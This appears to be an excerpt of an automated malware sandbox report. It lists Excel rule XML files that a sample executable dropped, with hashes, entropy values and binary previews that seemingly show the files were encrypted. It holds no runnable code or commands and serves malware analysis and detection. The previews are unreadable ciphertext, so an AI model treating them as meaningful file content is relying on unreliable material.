                                                                                                                                      Entropy (8bit):7.6504790442649915
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:D3lLifbJd9sUrD95Iijv7vDWS2ug1QbycMKkFekpGgptX/ALBf+hV/AR6ZukIciD:r6mUrDfIi7W91fcZkFnJtXI0hV/AR6+X
                                                                                                                                      MD5:DFAA5A90B2D5EB7993A078682A61EA55
                                                                                                                                      SHA1:F228C541BEC68EFE0E696BC9DD05986ED158B88F
                                                                                                                                      SHA-256:A3EBB71261911BBC6B02E0B0C773F8E6092486B9EBD4905003FF961E591387E8
                                                                                                                                      SHA-512:463840989BB157B5E5B9D417BF596D080B71EEAE2ECD67FE7130E3EF2BBD6EA8508493D341B005E72B7CB048B5DB4BCD54603B9D71DF7EA759D8CAA45A6CF8D7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlr>...M.....R.h.J.x..@....G.7.>S2....M...2a8.Z....7.kN.~.F.Vy........l.s).*ro..y.B<K3....;.I..H.0G..F....=...s..`..h.%;...9........y....p...(ht.L..k".~.Y.[(,.Q....6`^.C...`..E,~.d.....$..*.0..0R..c....i.....V.y?xJ...m.D.h.7(J.|@.n.....d..i.pT..r<.V{(.7...P`..5....x:.........2.Y..8...TW.B29l._...a#.G......-.?2.k+.o.....V.e=.)..bK...."..X............T..sj.!..@...4.....n7..i.Q`... ..L....5..nV|:.*..e..a..l..Li......A..Y8...^.9..Mz8..ev.f$.G.7.2BT6....Tq.-.........;~FT.!..G..H\.4..3...P...h..%...?.......QL.....l.8...B.9a..gI4b$.f...5....p.....y..m.*(..Eth..8oS7.(.^.P~,.L$...,~Z..i1..)...d.Stp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule220004v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1172
                                                                                                                                      Entropy (8bit):7.823134764784815
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:0mq9STq6EJNT0LqY5s3pt+QFsXeDAvrlBQ0+rFFqEK9g7eomrSnM1ASbD:g2qYS7+QGXeDA400FFmg7eo5M1zD
                                                                                                                                      MD5:3F91417E9BF2E119B8C339FB6602C141
                                                                                                                                      SHA1:56748294CE52141E186AB9F4D3970344027BB8A5
                                                                                                                                      SHA-256:87EA93BEAD91896B850E9FE85A0FA099497DF24E4064080DBF75762C1DC8481C
                                                                                                                                      SHA-512:646B70137B64A0AF0CC32DA7AEE3E6B7F5840E9B6C72FDC0B0D434C28C72C967BB61B0023283FC636549141D4C67FBBAD66B3FD73C370FE6DF638C75DDE25201
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml......6.f|....>......ay=a.q.A.s..V.'..)."TK.yu....H"3i.(...H.#1...!.1..kdE6.P.@.]kT%M.f.,..z..Z...kw......u......,..\...c.....i..X}fe..eD.f.w.3g......R2..f..".....>....qf.+...;I.T.....s.#9.Z....r.q.T..dK.....U...iVU..3~_....Go.....K...9..{...H._..a......w>.........!(....E.|.{....=..b....7&.}.e.j.G....|fN.K....w.d..e.7...iy..........qE.Y....I......Z*..7.......Sg.M...c.+....*..+.w*m.8..8......yajk..T...H..z...G..e.....~H.M......3#.`9.Pf..G..:b..@.6`#A.z.5.u<.....,...P)c..LI..X...e.S.....qi.9=}0.{....r%...."....g.....Z..(.F......>....`C..P...O....~NJ\.%!x.5Y.v5.".bE.OCf...8UE=..P........}..........!G......4..........*QK..A.)..u.o\.j1y".QA.a...)...2...n.Y.....~.<SP.... ._-..RY..t7.......$ Ax...D#..:".\..H>.0. E..,fB....^EV..,y.1....j$.n.x...............U8...?+z.`Y.4......s..{....v.LY. ..%.o.>.....h..TBt..Is..K<.wCP...6.?.......)e{L.....*.......z./.O..J.|....1..[;.kA.....Q...g....`[....0.~&w.Y..E...`.....j.9.sx.,.L..@x......;.c;F....

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule220035v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):756
                                                                                                                                      Entropy (8bit):7.742977408006249
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:2wIZN5zTaexb7SsKu9yLWsWcEEsDdW1JPSLwucLRNt8i40V4lxwlcxpVRHnukIcq:2wC/HxfSE90WpE6dWj4wucLTFV4leluG
                                                                                                                                      MD5:E32986F56659E7CB7DBFC36B7CEDA500
                                                                                                                                      SHA1:425BA820478E057A083D096900E58998500F27B7
                                                                                                                                      SHA-256:1227C22F044516D39B696D63F5DEB204B54DC3C89A28C0A588098835A2C1C6D0
                                                                                                                                      SHA-512:771051C43219C6839091B449346D01A02A843D1CC4FD96CA97B4B787485FCC6924A8E7BFAC589A69C1E006BBE7D9C45519CB6F19C2A4185206FD2F631DBE6EF9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlK.d.W}........&..c.h...}..l:...B.}........K:>...TP...Y=|v..b:JNp|.eM..Y..../........s.x...Y>.2..'WYX....R...Yh.DF..<_E\...)..,.O:..:N>f..0&f.q.8.G..l.E..J.BuY.....E;..j....'~..[<...l...D1. .]....{.'...l...fe(......%.miR~...|s.....":bL...&...4.L.....[...FF.|.}...@..m...o.h......,.L..;.......]...y.{n...-......pe..%...wR..+..z?Z.S..J._.../.[G...8...h.#......@._H..A.7.bO......_.G\_...I0.Q.._..]...P.{.1K...C...W1.T.\..........c.w.l.dSU.D[........jz..k..E...W..;.....U......4.sd..S........X(.W..V....*.rJ.r.....L..S'.0/p..h...H6.l.......s....y%.P.....u...N.K.j.^..,NRd.E......%^..R!./b.4@.....X.....B.....5j...B....S.q.B.o.....Nf3m.`.O..V...4tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule220036v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):752
                                                                                                                                      Entropy (8bit):7.676368665329804
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:1+gluwuQJEptl+eeTRndkpYkydve0Gb78DrU9Zanvx+ukIcii9a:VnJEpsVdeMFe0RDrU9mxZbD
                                                                                                                                      MD5:060ACF742E4B7A1FD709C97A9A45E802
                                                                                                                                      SHA1:891F34E9F3AA9513D662B0E302F65C2746823855
                                                                                                                                      SHA-256:2588CEEE6B1C659145A1EDB04318CDE5E2139AD88C86EFEB3958318E71C60B34
                                                                                                                                      SHA-512:4ED2B7508456DCA8A0D3F2DACD001C23C34CEF67A2B1DD567D07E0CEBC49AD7E91E4EAA68C04CCF10CA44F6C31C947BE9CBCF862B75F3436C95FFACF58B38518
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml>..ux;.t...qN.z.kf>n.%.&4...zt0....\BE.*.U..L.^$xr.....U De.(...f..f.y.8...Zj..m].@....>7..W.\....[.F...^.U..%~.P.E.B..jH.`.t.7...^.s....i.,1)....7.2{..u...].....y.-...D.-MS.%.@$-_a..N......T....S...)....:.V..+.7i9V&nvW.7EE...L.v.b.....ks..Xw......u..._....-.5[...u.?.Ah...|N...H ."8..w....l./..m....v.[S.)..p.9.E*.....$`...... ....<..1u.l..D."..=.....0....9^..f,./Ws.....E....Nak..,U.K.Or..X..p.....!.....Z.J.i.....l........K...-.r...x%.5./].#.......u.^w..r..oh..n.%... .{...."....>.j.Z.....?Q..%....~..L....}.^......,fF...I..Y..*...|..).,f.&K ]...-Z...A.n.}!,<..].@.(..Q=...e....K.n....35.)...D$/.;.kr0.@VnI...f>...So.\.`...b..ltp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule222015v6.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1692
                                                                                                                                      Entropy (8bit):7.8844720539607245
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:hIK6rtqbQZgBU4GFCv8WK82q+hGO7irPD:hIK6iQSBSCvZK3ThGBrb
                                                                                                                                      MD5:6CC54B3D32E5D8BD2891D8EF0197503A
                                                                                                                                      SHA1:16A774411D2C8A6206C17959456709D81DED64D5
                                                                                                                                      SHA-256:DE6A1CDC9B49C47188AADA9509FD01A2E82C4FD810C68F18A2FC8A79CD1ACCFF
                                                                                                                                      SHA-512:7F2914175E685FA1FCD7A9D1D9A5A0B9345F83427984B58EE83EDD4161FF0E6870D87C76D0D8BFC419E35556FAC5E9099690E3BB7F0EBFB5E46D39110D50E3DB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlv.0.;.."M.tV..].a..V6H.v.\....-$.....X..[.k.;.AG.D*.4.,..q.6..G..<B.A...+7...v.?&.b..K.^d0..U'..^.....A.....]...0..w.#.ew0W..$.h.8....n)...B.a........5..|g.}..9....$..F...O..^..8zQ2{.M.@.S.E...y.}o..@g..UU..Q.....c7H+...b...`....n...B...x..".......i.ZQ3f....I.{...8 ...p..0.~}j...OnS......tN.(.6......"g_..!VGSO.>.r..>...*..:.>...|........:..1.... ..`o.....-.....[ck@...F.X.=.....ok@..f.q...C..d}........e..%.........,...h.WQ..D..F'[...t.IO{t5/.;.b..{.b[+=.......o...3.H.|...R...R(.F..E.....Y...^..-K..5}w.3...-.Fv...a..4.....:M...o.g..,.m.mC..$..Ip7...&..x2..l...vV4.j.....`:/w...pI.....i..B9./JO...D...j)2.7...(A^aB._..v+q/....C...@o......qv....8.x#......R.......U.C.C.6L.....c.3...,..o...."......$..r.tG.oW..HRc..........._.25..HfY5.._-8.t.....t.N...#.w1.ha..BT.%<.;zu....\.....y.E.U9q... ./|.:4..e-/...3....j......3.....N_....GEKr4\.[..uk.2#....O...a9....X.q...7........9..k...-y..tD,.o..V.5...-.47..4.8i..x....6..........@.|....{.ai

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule222042v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):882
                                                                                                                                      Entropy (8bit):7.733563592766898
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:VW61dvXkpTwtk/IqVr8meXE5F9H8pwXxl/IrAXnOKgbD:VW6L0GD90lH8pwXx5/6D
                                                                                                                                      MD5:2F7018CBE356C9B914E1CEB37992774F
                                                                                                                                      SHA1:20E3C5C2DFDC74A0164CD069E2608A570D9DA4FD
                                                                                                                                      SHA-256:B4AF5045BDC9C8A0E043CFCE7B2B1E691CD6BF957EB80EBF640E7699FFDA8C01
                                                                                                                                      SHA-512:9685667E03186EE6157BDE49D940DA35AB1BE540CE5BE67BD03491057B89E5ACE4AA1C0464465FE48D00E9156056702B4130E66C7850C6556F13045F6393A103
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..n....-..}.s..,-..)p.f..X.z..J.(=.=..n...7.Ba...c.8...lx.bT8......+..^.*.}=...)..gAYMp..o..cZ.....Xi.....R........d8p..5. .\..Qp>..%.v...s.t.s=q&.d..V..../H/.#}.o..9...{C.X$.e.{..F..U.@............|.>.?...q..J...N.UaV..Y..-G....Qf...]..D5.Q.ms.yN.yD..&..0,..f..%M;.p..2...h....|e{.9k u...CM..p~.....%J.@..Q.D.K..=]......x.nx...t=..0T.......<......... ..I.%.:6....#VY..{..)EZ.9...yoA.O....\.8......*.u....AM..Mo....^..Bz..hx.].#..o....6...t.....0Z..r.uy.......%.....v.:..S.k..._.}....i6...... {..v..'.Tz?.o.E......Zi....b.2......b.....$.....>pL3}..Dd.Zf.Gg..h7.c...Vc..,igZ.F].7..G.....D.%*~...y..b_.]_bp.uj...{.U....W.yi..;p.f;.SdZB.1$:.....8 .q4`...qu...#[H..N.."..1.aze%M0.8~5}....o.c.xZ(W.....v...~..r.f]o.0C3.......L..../6x..m..c\........N.cIs..H.A.....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule222043v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):953
                                                                                                                                      Entropy (8bit):7.791407337999621
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:rufgkGiVl232SEdr39beQiEfzYT1sL77gbEb7bD:rxkGiVl23ydpbdifTe7UbEbD
                                                                                                                                      MD5:83B42F3FA834E67B725023A42A0DEF04
                                                                                                                                      SHA1:34CCA27288D8FE4F1434ED986C6607DEB51C0F27
                                                                                                                                      SHA-256:03B793511AEB4B349A14C03E90A008E951B731A266D3952CDDC75E37EDF9B348
                                                                                                                                      SHA-512:A1497F3511A7F66D38709C0F8CA363DA27C707059B295681A833F70197422DD2914058ABF7126721B3C21B79CDE47A5D158DE761FE5B63044C4E9DC1B86469F5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml+.\/n..Y./....t.....<Z(.~f.*!....w=[Q.^.2s.wj2N..d.....q"......!'.l.ba/H..!y.)&...[,...T[.6..j2...D......Q..g.WP.[.-l.fQ|h.|z..4..];.:...I......$b*....0.'D}.M..>-..'.76....o.Al.......5..PH..rS.h...x..11 w...Y....#. 8.(..cK=...e....A..OK......g.E.pTh.. N....U........yO<:]LT..j........C...V._..MD.hE.%.q.\>...,.;n.g)....4'(U.xEuF.........K...,7..G.Y......l.....R..Z.h.O...4..+3.Q..f..[.gp2_.............J9{...n.R....-DE...VkiS......q?.p\.....b..>R...d:_..@..m...|..7?..lK...@P5..._..S/..B...|....Ki3B..*9..<./..I9]h..n...).RY..e....1V9..Z.x..v.-]TI'O..9Z.z}T..b....Y..xh..z...........$.1.........=*[A@..L>...jV..V.J.....(.|3..D..R!.j..-.|.r..L$../u|.v...b..2.Q.F.f.<j5h'.E......8f.J.i..g.T!7...s..n]..M.?.....#...M7@.E]!%.U...dC.g...vzL?R.'....@..w1...kgo.".s9.......k,........1.v'N.+......dg....5.X..._....db.2Ts9:.?'.g.....r...t...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule222049v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1139
                                                                                                                                      Entropy (8bit):7.809938855292953
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:sTk5vnqwQfSnt08jM7G+uj2NPOvx/HJgg1sT3jm/BAEbD:s4owQKS8jM7GGNPOJJBqjmJAOD
                                                                                                                                      MD5:C5CE5868B3ED45CC51FAA48D85D19A64
                                                                                                                                      SHA1:ABAF3980D44B9089E9F292DAD7447404466A1698
                                                                                                                                      SHA-256:14F59490B5ECB8D596DBDFE3E15F656045E2B0445D7BA4B62A33B85DE1AB3FE3
                                                                                                                                      SHA-512:E56B853EDF3ABF71D8F0E142B2CE6C5840FDC5EEA000CC7FCDB4A2BC9EF2806E0E73F8D972ED259A623CF81067B6ABE8E50286879A396EE654E587A3726A046F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...8A. .5.m;]Mk....|,G.'S1.p.....}....Z K.>-..C...I...op.9....._..:.........*.......n.....Y...3...m....^.....@>Z#...........;..-....su9dM.|..7..C.#..V.j.9../.........MCh...]/.fjX.<R.>.W.4#+....5bP..9....3x..5D.+........6.....f......".I.i..<{..W.n...Df..:nT.N.}Q.._[5T.*'.|..y......%.{t6#'o..p...."IF...Ns6.3.._...I..p.H#.h...?0&..^.!.J.P]..z........'.".z0.g.......4.zXVyYw...!&\.*s.v.@...u.k.V={L....Co&H.".`y.W....b.. d!\.D.;f.6MT.3.. .>$2H.......n..3*.oP j..UU7tL*.J..fh....z.a.W....]>...9..e.Q.p..|u..6...9 ?..3^X.r..\..........gC.........Aoc..h....C.n..Y..._...!R..../..Z...!.t.....V..]...,.........Q..k..l.*..{..A......T...S....e.V7..j.....,Ik........4Pd$>Y.......*..c.Gf...Oy.Sg@.]....c5jx.9'j..lZ.R.!......z..'.qS.........".x%.Y...W......"......R\. .k8aA5bQ.3....:..............N.....u..z.x?.B_.....G...M....>{9.....9...6.D...yFsW...`..-...:eC..K....'].....I....O..2........v......e.o..x.:[.._....}.....H-kV..u.&Y.........

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule222100v7.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1678
                                                                                                                                      Entropy (8bit):7.8792731244562475
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:u4bhbI79bdtOE88t4c9upw1q3ttO1HYp5GiCH94R2jD:JKR88t4rpEq3ttM4vgdL
                                                                                                                                      MD5:F415566CB055731CD3F61D4F297DE508
                                                                                                                                      SHA1:78ECF5BC146FE8828C1DE0B9059A7937A35971CD
                                                                                                                                      SHA-256:D20179C49803270A6D35263834D1C46D8974A1B07F82CCCE775ED58961E37AE0
                                                                                                                                      SHA-512:EAE9304708B48B9A8E94D8FE9AD818661AD37DC879B3FAF4A13AE86BED0873A2527915DBA68365EA9CD72A080ABB0C5B5E96893633FF8CA2956F0B919D84D11D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.0...s...K)..n..s..D.w...`.{.|e1....l.......&-.A&.K.....v........R[........o'.w....E...-`Q!]....A..-.M6...[.R.2.J;U~.7.....BQ...hi....5...... ..#s.F...^.......q..$..^...+9....ho..-.......{..9.....V...@(.....[.M...S..E.I|..l..(.6mx=..S..S...`.9 .Z......2.f..)i.4.(.<..#H.@..?...r......H.._>v9v|..';...C.!...>....9..^ q.3.C...@.$..g...(P.D....U$...5....n.......@G.n.....e<.'..f.^..;.M....9["...M....h.......-..*...3..i.v{9*v.W...x.D!...&..hH...J../...Y...WM..7..Al..n7.XP.../.....)..38M...-.`.;.a..'..Q..$dq..m.Mwgg).B.IR..c........t..ac....B.......Pf.p\.3...+R..aD.........h?+qE..).WZW.hH..rgLW....c..n..5.Q..4.$.......Vd...D.......b...._`.4ie..0T.]o..tw.j9.'9.o.qxz....>.(.WY.....U7QWN....]d.v....}..L.K.Y!.\?.....s..!<.*.KJ.})..C.f.}....lk..t.Y.P........Td..s.~K..B..I.K,"..66U.F.TPQ..zh.TK......y...7\x........^mk.k?....[ir......X.oE...~R2.A.]?V.Fi..4iv.l&........3.:.....k.U.w2{iJV O..g[.y@>...T..^.../..........R.y..e<..MZ..&...F>.%...#

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule222101v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2075
                                                                                                                                      Entropy (8bit):7.905911131676771
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:fsmw0qMYRIIMmpV9TRpESLFptAsXsq9C4fUlPgZPZOj5YCeD:lqMYR4olpbLFpGA9fO0Cm
                                                                                                                                      MD5:6C7109FB58B1448D27F0C078E68920CB
                                                                                                                                      SHA1:F0CC3F38C1029B2064766CB803230F11C804B550
                                                                                                                                      SHA-256:C00044AF7EFB496D06A34AFF6509FFFB1CE9D167F11671CC45DA2B4709F23DBA
                                                                                                                                      SHA-512:A69C30907048F44F29A1C33E8CE40842AD26A4EA2DAD87A5626239180B55B160C49F36F8398D0EECD7A751040944890AA9114AF9D0EA96C4685683E604BD5DFA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.........."jE...uYa..jR.B'..q..E.B.0....![...m.V.bg..t..&f....|'.V6....^..B/b..*...-.......X.....f.......T.}..*,..TK..V3.Q:...M.+=.C.I.t.....0.W......k......tn.<.T...@.I....N....a.W.../...4u.....8[.B.?......7....{.5*..D*\..|.........l..l.9... ........Q~.....f..i.Ot3..w"+ ..$...9...y~./...A.o..n......;..Y..{..9..v.[.....}.%-....b..w...B..J......ou..J.u..k..@.`A.|...C..9.f........c..cl.7u."../..&9.....A..............t. .\ylK+.9...n. w.JcZgi..S.eL....@..m..].0...G.X8....x.;!4..W.......+....h.8..............b_'..#{....,[0..2.~...]..!.R...$....n.....6..n....AuX..E..n.l.h..\...Sh.p;.N..0ajV.T2r.t....>c...7....6......?......lD...2.P.c.5..U.r.....C5.Zm.{..7.....~u....x./L...B....C..zp..Ix..}.6..q`......]7..#\..b...I.]H.JK./...:.y.?.']..j...S.>}.p...].8..{.A..R..H.......F..55y#.N\...............I..-..2. ./..., n......Z ........;S...1f`..s.hY.c|...I..yN.3.......).^C..*.!.....Q.}....'Y...). p...+L.....Y.1.:.4~.E`.O3..pN...V8.L.....3^~M...d.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule222102v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2088
                                                                                                                                      Entropy (8bit):7.895582167369965
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:m1iqw4vYhqbyQxiJtlxbkqJk4+GimCY7/wiL+9QTMOIgcOND:mgqwyY02Qwl1kGr+5mCY/w99XOt
                                                                                                                                      MD5:E8FD52F8A497B496B62CC806283A12B9
                                                                                                                                      SHA1:CC3C3284D9FD2F06B4E5516B0E23C2B55AFA06B2
                                                                                                                                      SHA-256:0977F84A4201BA0A4B1E290AB5078E8FBCCB92334575E002218EEAF1CAA82295
                                                                                                                                      SHA-512:D8C4B2FCB114CD890F2AD05E52C19E078FBAA358E6BE5AE544D6CE67B9DB3D53E6C7EAD88883814AF60682A7687D8B2E58EA4C1B622EF4B0E691783BF5E178F4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml\.".+.2MK.}..Ob.UV".6.n..9].4..E..}.......f....p;._.x...r...)X....B..0..sj.f...[.%.:.WGg.&.K.W.1.....~X......9..#...V..F.p...(..D8....|5.#.?E..:..|.<v......f...d..N...>.J C.}.H.L\...W.._....s.e.......F^'.;...-r..{.D.M..7T.d.?I;.s.........K_...f..x!t.w.bf..|.x.......?vl-v(..Y...futr.c#\.,......'...,L'x..B`F.N?\A.......\.X&..w...x .0.IE...'."..d~R..n...>.{,70..9.._....6....a8......L.l..?GG......a...........6..."..../}1.....h...D]'.K..!..3....lG...4p..j.2....mN....Q.q..%.....Yl..Q..w,...h..8.....~.......+.*}?.i....0...,.X.f.e.D...0(.,...X.f.......... ....oR.(.K{zd=.r..v.f...x...'.......s...TS.f.I)......<H...f7..6...*c.. .d..C.D{p..Tn....B..............u...?.Q.)...._...}?O...i.$..w..s.........V ..L.9..WbR!.P_...vKrt.....h.98M3....+....d..hU.o.[z..4..-W.@...W...z.D7.Elp.sY....t.r.d....VE.GB,Tt.....>.=|O..[...ii#e....]....O.b.chh...t.bB.e....V.....~..c..`.K.. ...L....s..3....Z.NCRy..x..?L./..k.S..s..^..!.....7.R....dB..}.(..b.."zK%1...Y

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule222200v5.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1563
                                                                                                                                      Entropy (8bit):7.879950327071599
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:HAHERV8Cm7S4ogXbrHXgPC4z4AeFnsjrD:HsEMX7S4oOQrTeejH
                                                                                                                                      MD5:9B0341E36DFE83A13AA941DF296EBA86
                                                                                                                                      SHA1:A9DB9AC1F51070B0573935A70C3CD2FC370B12DE
                                                                                                                                      SHA-256:B0E7AD2617B024E533445546ADC8FB6273A95C8098F9E34C125749BFFC377624
                                                                                                                                      SHA-512:0660B2942B4542EF7186C92A30A4C800F695D509AE1E526C1BB8DEE2537632A68B6103A39CDC7784C66FB282E97A0EC6AA103CB972F74651D7076C994467EC4A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.n.....}..q.1.xo..D.+.i]...E.aW.8........pL(O.:(.t.=.t..I.=j....B*j..VU...L....b.i.[o.r.o~s...c..W....4....B..WnE...3T.).........^$..8..............w.....*O%..3.3.........D.T~f7..0'.F.+.....]."=.o........g.&.E"....B..S...j......,6s9.%h...etr..K...r.x.M.........B.......GG..m#../...ri.n...T#: .UV^..va......e..|.b...<.}z.K=.n.n<&.:!.._ -..0...B>RP...e.YYm..V...Ru.._WE.og@.J......x....Lv".x ....4..^..........`'0....<.....+h...z..%.!..e.q..`.&w...=..y;.........2S....`.Xb.....ON).....I.....2..B.$.....45.f.#...>....*s...1c......z.c.y...T...e.TF.q...\c....Jp..$.M.....y.R.q.0.mO....K.-..d......FS....I........Y^..f.......... ..q(....>......:.7..E..Y...c.8.sn\..5.G.n6.9_...m'z..J....&....A5...Zc........i..^...}.J.}.0+TKs..=P.H.U8/...........np...i...?./.p..n.8!.+..T)....X.a.....t.)....{......fR....J...3r4V.~..yS.Bh4........g..sv..d.@..,..F"]|.v../.C.~...5...^C...p..........p!....M.E.......[.Z.J)k.7...x*.V.6n.<.*\d.......+..}...aa1.].V|.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224008v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):748
                                                                                                                                      Entropy (8bit):7.7049503623732765
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:nrPIpliAnEWQIeC5XblgIhmgWdZwh+2vuBte7Vy7Qs60ukIcii9a:AliAEfCtbCIhXWdZQ+yV/XPbD
                                                                                                                                      MD5:34C387EBA3583A58FF153A61CC918EE0
                                                                                                                                      SHA1:45330DF938509E127A22168472DCBEACB32EDE19
                                                                                                                                      SHA-256:2D8331F2E91590FF33D3A7C013503571E217FD522C9C30E78144F14FDA133ADC
                                                                                                                                      SHA-512:1D88FA1547273B785FCCCFBB70C9993E0E37DD645C6F57AC5F883CD0E8ED481C3E231C9CFA1EA7E2C3FCEA3E2A95099864D081BC05F4E62212815B444629F526
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...k..C.. M.@r....0w.R.aY.v.H...X...!N.:m%z...0t/r..s.xz.....h../..g..&......*.........FB.). 9.O..W...J....}..ZZ.4..*J.....l..r..O.r.}*.?..TF.=._..<Y\).{..U..m...\Q.Yd.!..7M>...~u..5B..ac8.......Q.q..jp..>.....+..ZS.}..I..p,.....3......L.....M...[gi...{$.W.}.8M.@a..O...;.P..v.....3.........hm5&4..._.+.E....\..B)|..3.._<e.....AF.7..)..If.9...-.a...~.....pq:..^.Z....\.1...I..`..M.. .d....%.B....e..i.E......}Y7..d.R......n ..gn.%rB.%.=.r.#...e.IX-\ }.gv..^.)....l..#H.g.1;..3Y;5.7..ss.:..h}Aw.^..x.....b.....$a..n.g,..Pm*a.h..I.....5y.e`3.{._[}..p.....a..W.8r..%b1.{....L.F.x7..$..t.........3.......U.....x..?u..h...2.,..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule224010v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):785
                                                                                                                                      Entropy (8bit):7.6778036048636595
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:oSNPiDHRKJO/jN6m5JPjD7YgSdJpj0EvuH/tnH3mzFCu/uofCZ9s3rYukIcii9a:VPiDHRSiImH7D7oXHvuftnumOu9WXbD
                                                                                                                                      MD5:0E4AD6971E9403BFF36B8B1B9659BF25
                                                                                                                                      SHA1:7E00B5A44D2150BC42C320056431AC29202E8581
                                                                                                                                      SHA-256:761232CF1B6B40233C623A63E8DEEB31FB88C3AAE83969FF80F72986640E8562
